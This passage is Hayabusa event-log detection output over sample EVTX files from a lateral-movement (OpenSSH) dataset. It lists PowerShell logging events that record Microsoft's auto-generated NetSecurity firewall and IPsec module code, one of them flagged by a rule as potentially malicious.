[System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Disable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Disable-NetFirewallRule' -Alias '*'",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.905 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; value=""True""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.925 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.926 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.927 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Show-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.927 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Get-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.928 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.928 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.928 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.929 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.930 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.930 +09:00,win10-02.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetFirewallRule"" ParameterBinding(Export-ModuleMember): name=""Alias""; value=""*""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.080 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('IPsecRuleName')) { [object]$__cmdletization_value = ${IPsecRuleName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Profile')) { [object]$__cmdletization_value = ${Profile} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Profiles'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Platform')) { [object]$__cmdletization_value = ${Platform} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Platforms'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Mode')) { [object]$__cmdletization_value = ${Mode} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Mode'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('InboundSecurity')) { [object]$__cmdletization_value = ${InboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'InboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('OutboundSecurity')) { [object]$__cmdletization_value = ${OutboundSecurity} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'OutboundSecurity'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet')) { [object]$__cmdletization_value = ${QuickModeCryptoSet} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'QuickModeCryptoSet'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Phase1AuthSe",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.080 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"#requires -version 3.0 try { Microsoft.PowerShell.Core\Set-StrictMode -Off } catch { } $script:MyModule = $MyInvocation.MyCommand.ScriptBlock.Module $script:ClassName = 'root/standardcimv2/MSFT_NetConSecRule' $script:ClassVersion = '1.0.0' $script:ModuleVersion = '1.0.0.0' $script:ObjectModelWrapper = [Microsoft.PowerShell.Cmdletization.Cim.CimCmdletAdapter] $script:PrivateData = [System.Collections.Generic.Dictionary[string,string]]::new() Microsoft.PowerShell.Core\Export-ModuleMember -Function @() function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } } function New-NetIPsecRule { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0', ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [string] ${IPsecRuleName}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled] ${Enabled}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Profile] ${Profile}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${Platform}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode] ${Mode}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecIn')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${InboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('SecOut')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy] ${OutboundSecurity}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase1AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Phase2AuthSet}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule] ${KeyModule}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowWatchKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${AllowSetKey}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteTunnelEndpoint}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='cim:CreateInstance0')] [uint32] ${ForwardPathLifetime}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='cim:CreateInstance0')] [bool] ${RequireAuthorization}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${User}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Machine}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemoteAddress}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Protocol}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${LocalPort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string[]] ${RemotePort}, [Parameter(ParameterSetName='cim:CreateInstance0')] [WildcardPattern[]] ${InterfaceAlias}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.InterfaceType] ${InterfaceType}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { 